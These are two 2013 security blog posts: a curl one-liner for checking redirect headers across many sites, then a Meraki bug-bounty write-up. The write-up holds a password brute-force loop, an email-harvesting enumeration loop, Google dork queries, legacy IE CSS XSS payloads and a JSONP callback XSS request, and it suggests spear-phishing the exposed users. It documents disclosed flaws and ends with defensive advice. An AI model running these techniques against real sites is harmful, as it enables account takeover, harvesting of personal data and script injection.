Thursday, 30 May 2013

A Curl One-Liner to Retrieve Headers or Response Data

In this post I'll cover a simple curl one-liner that will let you read response content from multiple sites. I had a list of URLs, and for each URL I wanted to check whether the site redirected the user to another page via the Location header. As usual, a magic one-liner came to the rescue!


Retrieving Our Data

First up, I needed a way to send a request and receive a response from the remote server. Wget and curl are both great options; I went with curl. Because of the company proxy I also needed to include the --proxy flag.

curl -i -s --proxy http://myproxy.com:8080 www.google.com | grep Location:

  • By default curl doesn't include the response headers in its output; to actually see them you need to use the -i flag.
  • curl often displayed download progress messages I didn't want to see, so I included the silent (-s) flag.
  • As I was just looking for redirections, I added a bit of grep on the end to show just the Location header.
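
As an aside, if you only care about the headers, curl's -I flag sends a HEAD request so no body is downloaded at all (just bear in mind some servers answer HEAD differently to GET). A minimal sketch:

# HEAD request: headers only; grep -i also catches a lowercase "location:"
curl -s -I --proxy http://myproxy.com:8080 www.google.com | grep -i '^Location:'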


For Loopin'

As I wanted to grab the header from multiple sites, I needed to run the curl inside a for loop.

for i in $(cat hosts.txt); do curl -i -s --proxy http://myproxy.com:8080 http://www.$i | grep Location:; done

Here I read the hostnames from hosts.txt and, for each host, download the content and search for the Location header. My hosts were in the format "test.com", so I included the http://www. in front of the $i.
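
If you prefer, a while-read loop does the same job while avoiding the word-splitting quirks of $(cat ...). Just a sketch:

# read one hostname per line; -r prevents backslash mangling
while read -r host; do
  curl -i -s --proxy http://myproxy.com:8080 "http://www.$host" | grep Location:
done < hosts.txt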


Sorting Output

Using the above one-liner you get the grep output and nothing else, so I couldn't tell which site had which header. To fix this I assigned the curl output to a variable, performed a check with double brackets to see whether the variable was empty (i.e. whether the site had the header or not), and finally echoed the results.

for i in $(cat hosts.txt); do data=$(curl -i -s --proxy http://myproxy.com:8080 http://www.$i | grep Location:); if [[ -n $data ]]; then echo $i $data; fi; done

My final output looked like this:


You can see Google redirects me to the local version (.com.ph), and PayPal/Facebook redirect to the https version of the site.
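
For illustration, the loop's output looks like the following (the hostnames and redirect targets here are just examples matching the description above, not a copy of my actual results):

google.com Location: http://www.google.com.ph/
paypal.com Location: https://www.paypal.com/
facebook.com Location: https://www.facebook.com/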


Final Thoughts

I love a good one-liner, and this simple script can easily be altered for different headers or data depending on what you're looking for.
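For example, a quick tweak to hunt for the Server header instead; only the grep pattern changes:

for i in $(cat hosts.txt); do data=$(curl -i -s --proxy http://myproxy.com:8080 http://www.$i | grep -i '^Server:'); if [[ -n $data ]]; then echo $i $data; fi; done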

If you're just interested in the headers, it's also worth checking out curl's special output variables, as described here:
http://beerpla.net/2010/06/10/how-to-display-just-the-http-response-code-in-cli-curl/
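
A minimal sketch of that approach: the -w/--write-out flag prints variables like %{http_code} after the transfer completes, while -o /dev/null discards the body:

curl -s -o /dev/null -w '%{http_code}\n' --proxy http://myproxy.com:8080 http://www.google.com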

Hope you guys have found this useful. Improvements and comments always welcome!


Cheers, 

PwnDizzle out.

Saturday, 11 May 2013

On the Meraki Bounty Trail


Back in March, Meraki started a bounty program. I ended up digging around the site in April, so I missed all the easy XSS, but I still came across a few interesting bits and bobs.

Today I'll talk about six issues that caught my attention, starting with the mediocre and leading up to the slightly more interesting.


#1 Missing HTTPS

No SSL on the tools login page meant any attacker could sniff your credentials right out of the air; who knows, maybe even while you're using your own Meraki wifi.



#2 Sensitive File Disclosure on Partner Site

It's always amazing what Google can uncover. In Meraki's case it turned out that a number of potentially sensitive files for partners/resellers were (still are?) accessible through Google. Want to know how much a Meraki AP really costs and what cut your Meraki reseller is taking? Easy, just Google for it!
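
I won't repeat the exact queries, but dorks of this general shape are how these files tend to surface (site: and filetype: are standard Google operators; the keywords are purely illustrative):

site:meraki.com filetype:pdf pricing
site:meraki.com filetype:xls reseller discount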


Needless to say these kinds of files shouldn't be publicly accessible.



#3 Lack of Brute Force Mitigation

Anyone was free to guess user passwords an unlimited number of times without experiencing any kind of lockout or captcha. In the screenshot you can see that on my 123rd attempt I guessed the correct password (meraki123) and received a 302, indicating a successful login.
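
As a sketch of how you'd demonstrate this (the login URL and parameter names below are hypothetical placeholders rather than Meraki's real endpoint; the 302-means-success check matches the behaviour described above):

# try each candidate password; a 302 redirect indicates a successful login
while read -r pass; do
  code=$(curl -s -o /dev/null -w '%{http_code}' \
    --data "email=victim@example.com&password=$pass" \
    https://dashboard.example.com/login)
  [ "$code" = "302" ] && echo "Valid password: $pass"
done < wordlist.txt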


It was quite funny that when I (and presumably other people) reported this to Meraki, they replied that they didn't regard it as an issue that needed fixing! I know, it's hard to believe. Luckily they had second thoughts, and a few days later they had implemented a captcha check after five failed logins.


#4 Information disclosure when adding device

When playing around with my test account I found I couldn't test all the features, as I didn't actually have a Meraki wireless access point. Looking over the "Add Access Point" form, I was thinking I could maybe brute force the serial/order number field.


The problem was I didn't know the length or structure of the numbers. So I thought, why not Google it? Again Google came to the rescue, and after a little searching I found a blog post that actually contained device serial numbers!

Inserting these numbers, I received an error message saying the access point was already in use. Interestingly though, the error message contained the email address of the user who had registered the access point! Say wut?!


So now we can target that user with some clever Meraki-based spear-phishing, compromise their account and then go on to potentially compromise all of their wifi users! Nice.

And now for the catch... a twelve character serial containing letters and numbers gives a keyspace of 36^12, which isn't remotely bruteforceable. Even if Meraki produced a few million devices, it's still going to take a long, long time to guess valid serials. So it's low risk?
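
For a sense of scale, 36 possible characters in each of 12 positions works out like this (bc is the standard command-line calculator):

echo '36^12' | bc
# 4738381338321616896 - roughly 4.7 quintillion possible serials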

Well, the other possible attack vector here would be the order number: if Meraki are using sequential order numbers, you could potentially dump the email address of every user. Sweet! :)
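
A sketch of what that enumeration might look like (the endpoint and parameter name are hypothetical; each "already in use" error would leak one registered email address):

# walk sequential order numbers and pull any email address out of each response
for n in $(seq 100000 100100); do
  curl -s --data "order_number=$n" https://dashboard.example.com/claim_device \
    | grep -Eo '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+'
done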


#5 Splash Page Javascript Inclusion

Meraki allows you to define a splash page, which is a page users are shown when they first connect to your wifi. To create your page they provide an HTML editor but prevent the inclusion of sensitive HTML, e.g. script, iframe, embed, event handlers etc.

After a little playing around I found they had missed filtering of style attributes and tags, allowing Javascript inclusion:

<img style="xss:expression(alert('LOL'))">
Or:
<style type="text/css">BODY{background:url("javascript:alert('LOL')")}</style>

(Both vectors rely on legacy Internet Explorer behaviour, i.e. CSS expression() and javascript: URLs inside CSS; modern browsers ignore them.)



For any determined bounty hunters out there, I would definitely recommend taking a look at the editor as I'm sure there are more holes in it :)


#6 Mobile Site XSS

The final issue was in the mobile site. Burp flagged this up as XSS, and on closer inspection it turned out to be a JSON callback parameter being echoed back unencoded (allowing us to insert <script> etc.).
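
The pattern looks something like this (hypothetical endpoint; I'm not reproducing the real Meraki URL). The callback name is reflected verbatim into the response body:

# request - the callback parameter carries the payload
curl 'https://m.example.com/api/status?callback=<script>alert(1)</script>'

# response - reflected unencoded, but served with a JSON content-type:
# Content-Type: application/json
#
# <script>alert(1)</script>({"status":"ok"})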



However, in Chrome and Firefox this wasn't actually exploitable, as they correctly respect the JSON Content-Type sent by the server, meaning the Javascript is never rendered by the browser.


After a little digging I found the following:

https://superevr.com/blog/2012/exploiting-xss-in-ajax-web-applications/

I never knew that if you added a file extension to the URL, IE would ignore the Content-Type sent by the server. So by adding .html to the URL, IE would render the page as HTML, which meant XSS!
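
So hypothetically, a request along these lines (exact placement of the bogus extension depends on how the server routes the request):

curl 'https://m.example.com/api/status.html?callback=<script>alert(1)</script>'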

Annoyingly, it turns out the IE XSS filter doesn't take any prisoners. After a lot of playing around I just couldn't evade the filter, and Microsoft appear to have fixed the same-domain trick mentioned in the post below:

http://nomoreroot.blogspot.co.uk/2008/08/ie8-xss-filter.html

So the XSS was dead in the water (at least in IE8/9/10). Microsoft got something right!



Final Thoughts

Simplistic information disclosure and account security issues can seem trivial, but under the right circumstances they can cause serious damage. And the funny thing is that these are the issues vulnerability scanners will often miss.

Today's security tips:
  • Always use SSL
  • Make sure your directory permissions are correct
  • Always use brute force mitigation
  • Don't disclose user information in error messages
  • Don't allow users to insert HTML
  • Always HTML-encode user input when outputting it on your page

Questions, comments, corrections and IE XSS filter bypasses are always welcome :)